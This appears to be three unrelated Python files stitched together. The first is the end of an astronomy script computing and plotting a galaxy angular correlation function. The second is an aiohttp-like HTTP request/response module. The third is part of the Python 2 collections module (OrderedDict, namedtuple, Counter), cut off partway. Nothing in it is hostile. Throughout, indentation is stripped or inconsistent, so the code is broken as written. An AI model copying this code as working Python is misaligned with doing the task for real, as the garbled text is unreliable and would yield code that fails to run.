nums = np.loadtxt(name)[0:2]
# Parse the entire contents of the file into a big array of floats.
content = np.loadtxt(name,skiprows=2)
nentries = len(content)
content = content.transpose()
# We know there are three columns of numbers, so we can pull out what
# we want using an array of the indices.
if i==0:
bin_lo = content[0]
bin_hi = content[1]
dd = content[2]
nd = nums[0]
elif i==1:
rr = content[2]
nr = nums[0]
elif i==2:
dr = content[2]
print dr[0:10]
elif i==3:
dr += content[2]
print dr[0:10]
#print dd
print "nd/nr: %d %d" % (nd,nr)
############################################################################
# Calculate the normalization.
dd_norm = ((nd*nd)-nd)/2.0
rr_norm = ((nr*nr)-nr)/2.0
dr_norm = (nd*nr)/1.0
print "DD normalization:",dd_norm
print "RR normalization:",rr_norm
print "DR normalization:",dr_norm
# Normalize the data appropriately.
dd /= dd_norm
rr /= rr_norm
dr /= dr_norm
# Calculate the angular correlation function here.
w = (dd-(2.0*dr)+rr)/rr
bin_mid = (bin_hi+bin_lo)/2.0
bin_width = (bin_hi-bin_lo)
# Divide out the bin width.
#w /= bin_width
############################################################################
# Write out the function to a file.
############################################################################
outfile = open('default_acf.dat','w+')
for lo,hi,wval in zip(bin_lo,bin_hi,w):
        if wval==wval: # Skip NaNs (NaN != NaN); note that infs would still pass
output = "%.3e %.3e %f\n" % (lo,hi,wval)
outfile.write(output)
outfile.close()
############################################################################
################################################################################
# Make a figure on which to plot the angular correlation function.
################################################################################
fig0 = plt.figure(figsize=(9,6),dpi=100,facecolor='w',edgecolor='k')
ax0 = fig0.add_subplot(1,1,1)
fig0.subplots_adjust(top=0.95,bottom=0.15,right=0.95)
################################################################################
############################################################################
# Format the plot.
############################################################################
ax0.set_xlabel(r"$r$ (Mpc)", fontsize=24, weight='bold')
ax0.set_ylabel(r"w($r$)", fontsize=24, weight='bold')
plt.xticks(fontsize=24,weight='bold')
plt.yticks(fontsize=24,weight='bold')
#bin_mid *= 0.7
    #ax0.scatter(bin_mid,bin_mid*w,s=30)
    #ax0.scatter(bin_mid,bin_mid*bin_mid*w,s=30)
    #ax0.scatter(bin_mid,np.log10(w),s=30)
    ax0.scatter(bin_mid,w,s=30)
#ax0.set_xlabel(r"$w$ (r)",fontsize=24, weight='bold')
#ax0.set_ylabel(r"w($\theta$)",fontsize=24, weight='bold')
plt.xticks(fontsize=24,weight='bold')
plt.yticks(fontsize=24,weight='bold')
#ax0.set_xscale('log')
#ax0.set_yscale('log')
#ax0.set_xlim(10,200)
#ax0.set_xlim(-10,130)
#ax0.set_ylim(0.001,0.4)
#ax0.set_ylim(0.01,100)
#ax0.set_ylim(0.01,5)
################################################################################
# Make a figure on which to plot the DD,RR,DR
################################################################################
'''
fig1 = plt.figure(figsize=(15,4),dpi=100,facecolor='w',edgecolor='k')
fig1.add_subplot(1,3,1)
plt.scatter(bin_mid,dd,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"DD normalized counts", fontsize=18, weight='bold')
fig1.add_subplot(1,3,2)
plt.scatter(bin_mid,rr,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"RR normalized counts", fontsize=18, weight='bold')
fig1.add_subplot(1,3,3)
plt.scatter(bin_mid,dr,s=30)
plt.xlabel(r"$\theta$ (degrees)", fontsize=24, weight='bold')
plt.ylabel(r"DR normalized counts", fontsize=18, weight='bold')
'''
plt.tight_layout()
plt.show()
################################################################################
# Top-level script environment
################################################################################
if __name__ == "__main__":
main()
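################################################################################
# For reference, the quantity computed in main() is the Landy-Szalay
# two-point correlation estimator. A minimal self-contained sketch of the
# same arithmetic (function and argument names here are illustrative):
################################################################################
def landy_szalay(dd, dr, rr, nd, nr):
    # Normalize the raw pair counts by the number of distinct pairs.
    dd_n = dd/(((nd*nd)-nd)/2.0)
    rr_n = rr/(((nr*nr)-nr)/2.0)
    dr_n = dr/(nd*nr)
    return (dd_n - (2.0*dr_n) + rr_n)/rr_n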
|
|
__all__ = ('Request', 'StreamResponse', 'Response')
import asyncio
import binascii
import cgi
import collections
import http.cookies
import io
import json
import warnings
from urllib.parse import urlsplit, parse_qsl, unquote
from types import MappingProxyType
from . import hdrs
from .helpers import reify
from .multidict import (CIMultiDictProxy,
CIMultiDict,
MultiDictProxy,
MultiDict)
from aio2py.required.aiohttp.protocol import Response as ResponseImpl, HttpVersion10
from .streams import EOF_MARKER
sentinel = object()
class HeadersMixin:
_content_type = None
_content_dict = None
_stored_content_type = sentinel
def _parse_content_type(self, raw):
self._stored_content_type = raw
if raw is None:
# default value according to RFC 2616
self._content_type = 'application/octet-stream'
self._content_dict = {}
else:
self._content_type, self._content_dict = cgi.parse_header(raw)
@property
def content_type(self, _CONTENT_TYPE=hdrs.CONTENT_TYPE):
"""The value of content part for Content-Type HTTP header."""
raw = self.headers.get(_CONTENT_TYPE)
if self._stored_content_type != raw:
self._parse_content_type(raw)
return self._content_type
@property
def charset(self, _CONTENT_TYPE=hdrs.CONTENT_TYPE):
"""The value of charset part for Content-Type HTTP header."""
raw = self.headers.get(_CONTENT_TYPE)
if self._stored_content_type != raw:
self._parse_content_type(raw)
return self._content_dict.get('charset')
@property
def content_length(self, _CONTENT_LENGTH=hdrs.CONTENT_LENGTH):
"""The value of Content-Length HTTP header."""
l = self.headers.get(_CONTENT_LENGTH)
if l is None:
return None
else:
return int(l)
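# Illustration of the parsing HeadersMixin relies on (a sketch, not part
# of the public API): cgi.parse_header() splits the media type from its
# parameters, which is where content_type and charset come from.
def _demo_parse_content_type():
    ctype, params = cgi.parse_header('text/html; charset=utf-8')
    assert ctype == 'text/html'
    assert params == {'charset': 'utf-8'}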
FileField = collections.namedtuple('Field', 'name filename file content_type')
############################################################
# HTTP Request
############################################################
class Request(dict, HeadersMixin):
POST_METHODS = {hdrs.METH_PATCH, hdrs.METH_POST, hdrs.METH_PUT,
hdrs.METH_TRACE, hdrs.METH_DELETE}
def __init__(self, app, message, payload, transport, reader, writer, *,
_HOST=hdrs.HOST, secure_proxy_ssl_header=None):
self._app = app
self._version = message.version
self._transport = transport
self._reader = reader
self._writer = writer
self._method = message.method
self._host = message.headers.get(_HOST)
self._path_qs = message.path
res = urlsplit(message.path)
self._path = unquote(res.path)
self._query_string = res.query
self._post = None
self._post_files_cache = None
self._headers = CIMultiDictProxy(message.headers)
if self._version < HttpVersion10:
self._keep_alive = False
else:
self._keep_alive = not message.should_close
# matchdict, route_name, handler
# or information about traversal lookup
self._match_info = None # initialized after route resolving
self._payload = payload
self._cookies = None
self._read_bytes = None
self._has_body = not payload.at_eof()
self._secure_proxy_ssl_header = secure_proxy_ssl_header
@property
def scheme(self):
"""A string representing the scheme of the request.
'http' or 'https'.
"""
if self._transport.get_extra_info('sslcontext'):
return 'https'
secure_proxy_ssl_header = self._secure_proxy_ssl_header
if secure_proxy_ssl_header is not None:
header, value = secure_proxy_ssl_header
if self._headers.get(header) == value:
return 'https'
return 'http'
@property
def method(self):
"""Read only property for getting HTTP method.
The value is upper-cased str like 'GET', 'POST', 'PUT' etc.
"""
return self._method
@property
def version(self):
"""Read only property for getting HTTP version of request.
Returns aiohttp.protocol.HttpVersion instance.
"""
return self._version
@property
def host(self):
"""Read only property for getting *HOST* header of request.
Returns str or None if HTTP request has no HOST header.
"""
return self._host
@property
def path_qs(self):
"""The URL including PATH_INFO and the query string.
        E.g., /app/blog?id=10
"""
return self._path_qs
@property
def path(self):
"""The URL including *PATH INFO* without the host or scheme.
E.g., ``/app/blog``
"""
return self._path
@property
def query_string(self):
"""The query string in the URL.
E.g., id=10
"""
return self._query_string
@reify
def GET(self):
"""A multidict with all the variables in the query string.
Lazy property.
"""
return MultiDictProxy(MultiDict(parse_qsl(self._query_string)))
@reify
def POST(self):
"""A multidict with all the variables in the POST parameters.
        The post() method has to be called before using this attribute.
"""
if self._post is None:
raise RuntimeError("POST is not available before post()")
return self._post
@property
def headers(self):
"""A case-insensitive multidict proxy with all headers."""
return self._headers
@property
def keep_alive(self):
"""Is keepalive enabled by client?"""
return self._keep_alive
@property
def match_info(self):
"""Result of route resolving."""
return self._match_info
@property
def app(self):
"""Application instance."""
return self._app
@property
def transport(self):
"""Transport used for request processing."""
return self._transport
@property
def cookies(self):
"""Return request cookies.
A read-only dictionary-like object.
"""
if self._cookies is None:
raw = self.headers.get(hdrs.COOKIE, '')
parsed = http.cookies.SimpleCookie(raw)
self._cookies = MappingProxyType(
{key: val.value for key, val in parsed.items()})
return self._cookies
@property
def payload(self):
"""Return raw payload stream."""
warnings.warn('use Request.content instead', DeprecationWarning)
return self._payload
@property
def content(self):
"""Return raw payload stream."""
return self._payload
@property
def has_body(self):
"""Return True if request has HTTP BODY, False otherwise."""
return self._has_body
@asyncio.coroutine
def release(self):
"""Release request.
Eat unread part of HTTP BODY if present.
"""
chunk = yield from self._payload.readany()
while chunk is not EOF_MARKER or chunk:
chunk = yield from self._payload.readany()
@asyncio.coroutine
def read(self):
"""Read request body if present.
Returns bytes object with full request content.
"""
if self._read_bytes is None:
body = bytearray()
while True:
chunk = yield from self._payload.readany()
body.extend(chunk)
if chunk is EOF_MARKER:
break
self._read_bytes = bytes(body)
return self._read_bytes
@asyncio.coroutine
def text(self):
"""Return BODY as text using encoding from .charset."""
bytes_body = yield from self.read()
encoding = self.charset or 'utf-8'
return bytes_body.decode(encoding)
@asyncio.coroutine
def json(self, *, loader=json.loads):
"""Return BODY as JSON."""
body = yield from self.text()
return loader(body)
@asyncio.coroutine
def post(self):
"""Return POST parameters."""
if self._post is not None:
return self._post
if self.method not in self.POST_METHODS:
self._post = MultiDictProxy(MultiDict())
return self._post
content_type = self.content_type
if (content_type not in ('',
'application/x-www-form-urlencoded',
'multipart/form-data')):
self._post = MultiDictProxy(MultiDict())
return self._post
body = yield from self.read()
content_charset = self.charset or 'utf-8'
environ = {'REQUEST_METHOD': self.method,
'CONTENT_LENGTH': str(len(body)),
'QUERY_STRING': '',
'CONTENT_TYPE': self.headers.get(hdrs.CONTENT_TYPE)}
fs = cgi.FieldStorage(fp=io.BytesIO(body),
environ=environ,
keep_blank_values=True,
encoding=content_charset)
supported_transfer_encoding = {
'base64': binascii.a2b_base64,
'quoted-printable': binascii.a2b_qp
}
out = MultiDict()
for field in fs.list or ():
transfer_encoding = field.headers.get(
hdrs.CONTENT_TRANSFER_ENCODING, None)
if field.filename:
ff = FileField(field.name,
field.filename,
field.file, # N.B. file closed error
field.type)
if self._post_files_cache is None:
self._post_files_cache = {}
self._post_files_cache[field.name] = field
out.add(field.name, ff)
else:
value = field.value
if transfer_encoding in supported_transfer_encoding:
# binascii accepts bytes
value = value.encode('utf-8')
value = supported_transfer_encoding[
transfer_encoding](value)
out.add(field.name, value)
self._post = MultiDictProxy(out)
return self._post
def __repr__(self):
return "<{} {} {} >".format(self.__class__.__name__,
self.method, self.path)
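# A minimal usage sketch (assumption: a web handler wired to the Request
# class above; the handler and field names are illustrative):
@asyncio.coroutine
def _example_form_handler(request):
    # post() buffers the body and parses urlencoded/multipart content;
    # afterwards the parsed data is also available as request.POST.
    form = yield from request.post()
    return Response(text='hello %s' % form.get('name', 'anonymous'))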
############################################################
# HTTP Response classes
############################################################
class StreamResponse(HeadersMixin):
def __init__(self, *, status=200, reason=None, headers=None):
self._body = None
self._keep_alive = None
self._chunked = False
self._chunk_size = None
self._compression = False
self._compression_force = False
self._headers = CIMultiDict()
self._cookies = http.cookies.SimpleCookie()
self.set_status(status, reason)
self._req = None
self._resp_impl = None
self._eof_sent = False
if headers is not None:
self._headers.extend(headers)
def _copy_cookies(self):
for cookie in self._cookies.values():
value = cookie.output(header='')[1:]
self.headers.add(hdrs.SET_COOKIE, value)
@property
def started(self):
return self._resp_impl is not None
@property
def status(self):
return self._status
@property
def chunked(self):
return self._chunked
@property
def compression(self):
return self._compression
@property
def reason(self):
return self._reason
def set_status(self, status, reason=None):
self._status = int(status)
if reason is None:
reason = ResponseImpl.calc_reason(status)
self._reason = reason
@property
def keep_alive(self):
return self._keep_alive
def force_close(self):
self._keep_alive = False
def enable_chunked_encoding(self, chunk_size=None):
"""Enables automatic chunked transfer encoding."""
self._chunked = True
self._chunk_size = chunk_size
def enable_compression(self, force=False):
"""Enables response compression with `deflate` encoding."""
self._compression = True
self._compression_force = force
@property
def headers(self):
return self._headers
@property
def cookies(self):
return self._cookies
def set_cookie(self, name, value, *, expires=None,
domain=None, max_age=None, path='/',
secure=None, httponly=None, version=None):
"""Set or update response cookie.
        Sets a new cookie or updates an existing one with a new value.
        Only parameters that are not None are updated.
"""
old = self._cookies.get(name)
if old is not None and old.coded_value == '':
# deleted cookie
self._cookies.pop(name, None)
self._cookies[name] = value
c = self._cookies[name]
if expires is not None:
c['expires'] = expires
if domain is not None:
c['domain'] = domain
if max_age is not None:
c['max-age'] = max_age
if path is not None:
c['path'] = path
if secure is not None:
c['secure'] = secure
if httponly is not None:
c['httponly'] = httponly
if version is not None:
c['version'] = version
def del_cookie(self, name, *, domain=None, path='/'):
"""Delete cookie.
Creates new empty expired cookie.
"""
# TODO: do we need domain/path here?
self._cookies.pop(name, None)
self.set_cookie(name, '', max_age=0, domain=domain, path=path)
@property
def content_length(self):
# Just a placeholder for adding setter
return super().content_length
@content_length.setter
def content_length(self, value):
if value is not None:
value = int(value)
# TODO: raise error if chunked enabled
self.headers[hdrs.CONTENT_LENGTH] = str(value)
elif hdrs.CONTENT_LENGTH in self.headers:
del self.headers[hdrs.CONTENT_LENGTH]
@property
def content_type(self):
# Just a placeholder for adding setter
return super().content_type
@content_type.setter
def content_type(self, value):
self.content_type # read header values if needed
self._content_type = str(value)
self._generate_content_type_header()
@property
def charset(self):
# Just a placeholder for adding setter
return super().charset
@charset.setter
def charset(self, value):
ctype = self.content_type # read header values if needed
if ctype == 'application/octet-stream':
raise RuntimeError("Setting charset for application/octet-stream "
"doesn't make sense, setup content_type first")
if value is None:
self._content_dict.pop('charset', None)
else:
self._content_dict['charset'] = str(value).lower()
self._generate_content_type_header()
def _generate_content_type_header(self, CONTENT_TYPE=hdrs.CONTENT_TYPE):
params = '; '.join("%s=%s" % i for i in self._content_dict.items())
if params:
ctype = self._content_type + '; ' + params
else:
ctype = self._content_type
self.headers[CONTENT_TYPE] = ctype
def _start_pre_check(self, request):
if self._resp_impl is not None:
if self._req is not request:
raise RuntimeError(
'Response has been started with different request.')
else:
return self._resp_impl
else:
return None
def start(self, request):
resp_impl = self._start_pre_check(request)
if resp_impl is not None:
return resp_impl
self._req = request
keep_alive = self._keep_alive
if keep_alive is None:
keep_alive = request.keep_alive
self._keep_alive = keep_alive
resp_impl = self._resp_impl = ResponseImpl(
request._writer,
self._status,
request.version,
not keep_alive,
self._reason)
self._copy_cookies()
if self._compression:
if (self._compression_force or
'deflate' in request.headers.get(
hdrs.ACCEPT_ENCODING, '')):
resp_impl.add_compression_filter()
if self._chunked:
resp_impl.enable_chunked_encoding()
if self._chunk_size:
resp_impl.add_chunking_filter(self._chunk_size)
headers = self.headers.items()
for key, val in headers:
resp_impl.add_header(key, val)
resp_impl.send_headers()
return resp_impl
def write(self, data):
assert isinstance(data, (bytes, bytearray, memoryview)), \
'data argument must be byte-ish (%r)' % type(data)
if self._eof_sent:
raise RuntimeError("Cannot call write() after write_eof()")
if self._resp_impl is None:
raise RuntimeError("Cannot call write() before start()")
if data:
return self._resp_impl.write(data)
else:
return ()
@asyncio.coroutine
def drain(self):
if self._resp_impl is None:
raise RuntimeError("Response has not been started")
yield from self._resp_impl.transport.drain()
@asyncio.coroutine
def write_eof(self):
if self._eof_sent:
return
if self._resp_impl is None:
raise RuntimeError("Response has not been started")
yield from self._resp_impl.write_eof()
self._eof_sent = True
def __repr__(self):
if self.started:
info = "{} {} ".format(self._req.method, self._req.path)
else:
info = "not started"
return "<{} {} {}>".format(self.__class__.__name__,
self.reason, info)
class Response(StreamResponse):
def __init__(self, *, body=None, status=200,
reason=None, text=None, headers=None, content_type=None):
super().__init__(status=status, reason=reason, headers=headers)
if body is not None and text is not None:
raise ValueError("body and text are not allowed together.")
if text is not None:
if hdrs.CONTENT_TYPE not in self.headers:
# fast path for filling headers
if not isinstance(text, str):
raise TypeError('text argument must be str (%r)' %
type(text))
if content_type is None:
content_type = 'text/plain'
self.headers[hdrs.CONTENT_TYPE] = (
content_type + '; charset=utf-8')
self._content_type = content_type
self._content_dict = {'charset': 'utf-8'}
self.body = text.encode('utf-8')
else:
self.text = text
else:
if content_type:
self.content_type = content_type
if body is not None:
self.body = body
else:
self.body = None
@property
def body(self):
return self._body
@body.setter
def body(self, body):
if body is not None and not isinstance(body, bytes):
raise TypeError('body argument must be bytes (%r)' % type(body))
self._body = body
if body is not None:
self.content_length = len(body)
else:
self.content_length = 0
@property
def text(self):
return self._body.decode(self.charset or 'utf-8')
@text.setter
def text(self, text):
if text is not None and not isinstance(text, str):
raise TypeError('text argument must be str (%r)' % type(text))
if self.content_type == 'application/octet-stream':
self.content_type = 'text/plain'
if self.charset is None:
self.charset = 'utf-8'
self.body = text.encode(self.charset)
@asyncio.coroutine
def write_eof(self):
body = self._body
if body is not None:
self.write(body)
yield from super().write_eof()
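# Usage sketch for the response classes above (names and values are
# illustrative): Response buffers the body eagerly, and cookies set via
# set_cookie() are serialized into Set-Cookie headers when start() runs.
def _example_make_response():
    resp = Response(text='ok', content_type='text/plain')
    resp.set_cookie('session', 'abc123', max_age=3600, httponly=True)
    return resp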
|
|
__all__ = ['Counter', 'deque', 'defaultdict', 'namedtuple', 'OrderedDict']
# For bootstrapping reasons, the collection ABCs are defined in _abcoll.py.
# They should however be considered an integral part of collections.py.
from _abcoll import *
import _abcoll
__all__ += _abcoll.__all__
from operator import itemgetter as _itemgetter
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
################################################################################
### OrderedDict
################################################################################
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, PREV=0, NEXT=1, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[PREV]
last[NEXT] = root[PREV] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, PREV=0, NEXT=1, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[NEXT] = link_next
link_next[PREV] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
NEXT, KEY = 1, 2
root = self.__root
curr = root[NEXT]
while curr is not root:
yield curr[KEY]
curr = curr[NEXT]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
PREV, KEY = 0, 2
root = self.__root
curr = root[PREV]
while curr is not root:
yield curr[KEY]
curr = curr[PREV]
def clear(self):
'od.clear() -> None. Remove all items from od.'
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
dict.clear(self)
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) pairs in od'
for k in self:
yield (k, self[k])
update = MutableMapping.update
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
key = next(reversed(self) if last else iter(self))
value = self.pop(key)
return key, value
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self) == len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
'od.__ne__(y) <==> od!=y'
return not self == other
# -- the following methods support python 3.x style dictionary views --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
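# A short demonstration of the ordering behavior documented above (a
# sketch, not part of the module):
def _demo_ordereddict():
    od = OrderedDict()
    od['one'] = 1
    od['two'] = 2
    od['one'] = 99 # re-assignment keeps the original position
    assert od.items() == [('one', 99), ('two', 2)]
    assert od.popitem(last=False) == ('one', 99) # FIFO pop from the front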
################################################################################
### namedtuple
################################################################################
def namedtuple(typename, field_names, verbose=False, rename=False):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', 'x y')
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
    >>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Parse and validate the field names. Validation serves two purposes,
# generating informative error messages and preventing template injection attacks.
if isinstance(field_names, basestring):
field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas
field_names = tuple(map(str, field_names))
if rename:
names = list(field_names)
seen = set()
for i, name in enumerate(names):
if (not all(c.isalnum() or c == '_' for c in name) or _iskeyword(name)
or not name or name[0].isdigit() or name.startswith('_')
or name in seen):
names[i] = '_%d' % i
seen.add(name)
field_names = tuple(names)
for name in (typename,) + field_names:
if not all(c.isalnum() or c == '_' for c in name):
raise ValueError(
'Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a keyword: %r' % name)
if name[0].isdigit():
raise ValueError('Type names and field names cannot start with a number: %r' % name)
seen_names = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: %r' % name)
if name in seen_names:
raise ValueError('Encountered duplicate field name: %r' % name)
seen_names.add(name)
# Create and fill-in the class template
numfields = len(field_names)
argtxt = repr(field_names).replace("'", "")[1:-1] # tuple repr without parens or quotes
reprtxt = ', '.join('%s=%%r' % name for name in field_names)
template = '''class %(typename)s(tuple):
'%(typename)s(%(argtxt)s)' \n
__slots__ = () \n
_fields = %(field_names)r \n
def __new__(_cls, %(argtxt)s):
'Create new instance of %(typename)s(%(argtxt)s)'
return _tuple.__new__(_cls, (%(argtxt)s)) \n
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new %(typename)s object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != %(numfields)d:
raise TypeError('Expected %(numfields)d arguments, got %%d' %% len(result))
return result \n
def __repr__(self):
'Return a nicely formatted representation string'
return '%(typename)s(%(reprtxt)s)' %% self \n
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self)) \n
__dict__ = property(_asdict) \n
def _replace(_self, **kwds):
'Return a new %(typename)s object replacing specified fields with new values'
result = _self._make(map(kwds.pop, %(field_names)r, _self))
if kwds:
raise ValueError('Got unexpected field names: %%r' %% kwds.keys())
return result \n
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self) \n\n''' % locals()
for i, name in enumerate(field_names):
template += " %s = _property(_itemgetter(%d), doc='Alias for field number %d')\n" % (name, i, i)
if verbose:
print template
# Execute the template string in a temporary namespace and
# support tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(_itemgetter=_itemgetter, __name__='namedtuple_%s' % typename,
OrderedDict=OrderedDict, _property=property, _tuple=tuple)
try:
exec template in namespace
except SyntaxError, e:
raise SyntaxError(e.message + ':\n' + template)
result = namespace[typename]
# For pickling to work, the __module__ variable needs to be set to the frame
    # where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
result.__module__ = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return result
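# Example of the rename option handled above (a sketch): invalid or
# duplicate field names are replaced positionally with _0, _1, ...
def _demo_namedtuple_rename():
    Row = namedtuple('Row', ['id', 'class', 'id'], rename=True)
    assert Row._fields == ('id', '_1', '_2')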
########################################################################
### Counter
########################################################################
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(self, iterable=None, **kwds):
        '''Create a new, empty Counter object. If given, count elements
        from an input iterable, or initialize the counts from another
        mapping of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
super(Counter, self).__init__()
self.update(iterable, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.iteritems(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.iteritems(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
